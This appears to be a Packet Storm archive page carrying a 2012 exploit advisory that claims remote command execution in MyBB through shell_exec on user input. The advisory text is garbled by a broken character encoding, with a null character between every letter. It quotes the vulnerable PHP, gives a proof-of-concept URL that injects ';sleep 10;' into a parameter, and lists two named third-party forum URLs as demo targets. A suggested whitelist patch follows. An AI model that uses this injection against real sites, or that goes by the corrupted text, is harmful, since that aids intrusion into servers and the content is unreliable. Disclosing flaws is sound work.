what you don't know can hurt you

MyBB Remote Command Execution

MyBB Remote Command Execution
Posted Oct 4, 2012
Authored by Nafsh

MyBB suffers from a remote command execution vulnerability.

tags | exploit, remote
MD5 | 498a894709cb4a008e839390f75f5338

MyBB Remote Command Execution

Change Mirror Download
ÿþ#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�E�x�p�l�o�i�t� �T�i�t�l�e� �:� �M�y�b�b� �A�l�l� �V�e�r�s�i�o�n�s� �R�e�m�o�t�e� �C�o�m�m�a�n�d� �E�x�e�c�u�t�i�o�n�

�A�u�t�h�o�r� � �:� �N�a�f�s�h�

�D�i�s�c�o�v�e�r�e�d� �B�y� �:� �T�a�p�c�o� �S�e�c�u�r�i�t�y� �&� �R�e�s�e�a�r�c�h� �L�a�b�

�D�a�t�e� �:� �3� �O�c�t� �2�0�1�2�

�H�o�m�e� �:� �h�t�t�p�:�/�/�S�e�c�-�L�a�b�.�T�a�p�-�C�o�.�N�e�t�

�C�o�n�t�a�c�t� �:� �N�a�f�s�h�.�H�a�c�k�@�G�m�a�i�l�.�c�o�m�

�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�S�o�u�r�c�e� �:� �h�t�t�p�:�/�/�w�w�w�.�m�y�b�b�.�c�o�m�/�d�o�w�n�l�o�a�d�/�l�a�t�e�s�t�



�f�i�l�e� �:� � �/�i�n�c�/�3�r�d�p�a�r�t�y�/�d�i�f�f�/�D�i�f�f�/�E�n�g�i�n�e�/�s�h�e�l�l�.�p�h�p�



�S�o�u�r�c�e� �O�f� �B�u�g� �:� � � �

� � � � � � � � �$�f�p� �=� �f�o�p�e�n�(�$�t�o�_�f�i�l�e�,� �'�w�'�)�;�

� � � � � � � � �f�w�r�i�t�e�(�$�f�p�,� �i�m�p�l�o�d�e�(�"�\�n�"�,� �$�t�o�_�l�i�n�e�s�)�)�;�

� � � � � � � � �f�c�l�o�s�e�(�$�f�p�)�;�

� � � � � � � � �$�d�i�f�f� �=� �s�h�e�l�l�_�e�x�e�c�(�$�t�h�i�s�-�>�_�d�i�f�f�C�o�m�m�a�n�d� �.� �'� �'� �.� �$�f�r�o�m�_�f�i�l�e� �.� �'� �'� �.� �$�t�o�_�f�i�l�e�)�;�

� � � � � � � � �u�n�l�i�n�k�(�$�f�r�o�m�_�f�i�l�e�)�;�

� � � � � � � � �u�n�l�i�n�k�(�$�t�o�_�f�i�l�e�)�;�

�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�v�u�l�n�e�r�a�b�i�l�i�t�y� �c�o�n�c�e�p�t�:�



�$�_�G�E�T� � �+� � �s�h�e�l�l�_�e�x�e�c�(�)� � �=� � �C�o�m�m�a�n�d� �E�x�e�c�u�t�i�o�n�



�v�u�l�n�e�r�a�b�i�l�i�t�y� �d�e�s�c�r�i�p�t�i�o�n�:�



�A�n� �a�t�t�a�c�k�e�r� �m�i�g�h�t� �e�x�e�c�u�t�e� �a�r�b�i�t�r�a�r�y� �s�y�s�t�e�m� �c�o�m�m�a�n�d�s� �w�i�t�h� �t�h�i�s� �v�u�l�n�e�r�a�b�i�l�i�t�y�.� �U�s�e�r� �t�a�i�n�t�e�d� �d�a�t�a� �i�s� �u�s�e�d� �w�h�e�n� �c�r�e�a�t�i�n�g� �t�h�e� �c�o�m�m�a�n�d� �t�h�a�t� �w�i�l�l� �b�e� �e�x�e�c�u�t�e�d� �o�n� �t�h�e� �u�n�d�e�r�l�y�i�n�g� �o�p�e�r�a�t�i�n�g� �s�y�s�t�e�m�.� �T�h�i�s� �v�u�l�n�e�r�a�b�i�l�i�t�y� �c�a�n� �l�e�a�d� �t�o� �f�u�l�l� �s�e�r�v�e�r� �c�o�m�p�r�o�m�i�s�e�.�



�v�u�l�n�e�r�a�b�l�e� �e�x�a�m�p�l�e� �c�o�d�e� �:�

�1�:� �e�x�e�c�(�"�.�/�c�r�y�p�t�o� �-�m�o�d�e� �"� � �.� � �$�_�G�E�T�[�"�m�o�d�e�"�]�)�;� �



�p�r�o�o�f� �o�f� �c�o�n�c�e�p�t� �:�



�/�i�n�d�e�x�.�p�h�p�?�m�o�d�e�=�1�;�s�l�e�e�p� �1�0�;�



�p�a�t�c�h�:�



�L�i�m�i�t� �t�h�e� �c�o�d�e� �t�o� �a� �v�e�r�y� �s�t�r�i�c�t� �c�h�a�r�a�c�t�e�r� �s�u�b�s�e�t� �o�r� �b�u�i�l�d� �a� �w�h�i�t�e�l�i�s�t� �o�f� �a�l�l�o�w�e�d� �c�o�m�m�a�n�d�s�.� �D�o� �n�o�t� �t�r�y� �t�o� �f�i�l�t�e�r� �f�o�r� �e�v�i�l� �c�o�m�m�a�n�d�s�.� �T�r�y� �t�o� �a�v�o�i�d� �t�h�e� �u�s�a�g�e� �o�f� �s�y�s�t�e�m� �c�o�m�m�a�n�d� �e�x�e�c�u�t�i�n�g� �f�u�n�c�t�i�o�n�s� �i�f� �p�o�s�s�i�b�l�e�.�



�1�:� �$�m�o�d�e�s� � �=� � �a�r�r�a�y�(�"�r�"�,� � �"�w�"�,� � �"�a�"�)�;� � �i�f�(�!�i�n�_�a�r�r�a�y�(�$�_�G�E�T�[�"�m�o�d�e�"�]�,� � �$�m�o�d�e�s�)�)� �e�x�i�t� �;� � �

�r�

�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�D�3�m�0� �:� � �



�h�t�t�p�:�/�/�w�w�w�.�m�i�n�u�t�e�w�o�r�k�e�r�s�.�c�o�m�/�f�o�r�u�m�/�i�n�c�/�3�r�d�p�a�r�t�y�/�d�i�f�f�/�D�i�f�f�/�E�n�g�i�n�e�/�s�h�e�l�l�.�p�h�p�?�F�i�n�d� �I�t� �I�n� �S�o�u�r�c�e�=�R�C�E�



�h�t�t�p�:�/�/�w�w�w�.�a�r�t�i�s�t�s�u�n�i�v�e�r�s�e�.�o�r�g�/�f�o�r�u�m�/�i�n�c�/�3�r�d�p�a�r�t�y�/�d�i�f�f�/�D�i�f�f�/�E�n�g�i�n�e�/�s�h�e�l�l�.�p�h�p�?�F�i�n�d� �I�t� �I�n� �S�o�u�r�c�e�=�R�C�E�

�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�W�e� �a�r�e� �:� �K�0�2�4�2� �|� �N�a�f�s�h� �|� �E�h�r�a�m�.�s�h�a�h�m�o�h�a�m�a�d�i�

�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�T�n�x� �:� �A�m�!�r� �|� �M�.�R�.�S�.�C�O� �A�l�l� �M�e�m�b�e�r�s� �I�n� �W�w�w�.�I�r�I�s�T�.�I�r� �&� �W�w�w�.�I�d�C�-�T�e�A�m�.�N�e�T�

�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�#�

�G�r�e�e�t�z� �:� �A�l�l� �s�e�c�-�l�a�b� �r�e�s�e�a�r�c�h�e�r�s�

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

September 2019

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    1 Files
  • 2
    Sep 2nd
    38 Files
  • 3
    Sep 3rd
    30 Files
  • 4
    Sep 4th
    15 Files
  • 5
    Sep 5th
    12 Files
  • 6
    Sep 6th
    17 Files
  • 7
    Sep 7th
    3 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    24 Files
  • 10
    Sep 10th
    22 Files
  • 11
    Sep 11th
    22 Files
  • 12
    Sep 12th
    15 Files
  • 13
    Sep 13th
    5 Files
  • 14
    Sep 14th
    2 Files
  • 15
    Sep 15th
    1 Files
  • 16
    Sep 16th
    11 Files
  • 17
    Sep 17th
    16 Files
  • 18
    Sep 18th
    8 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2019 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close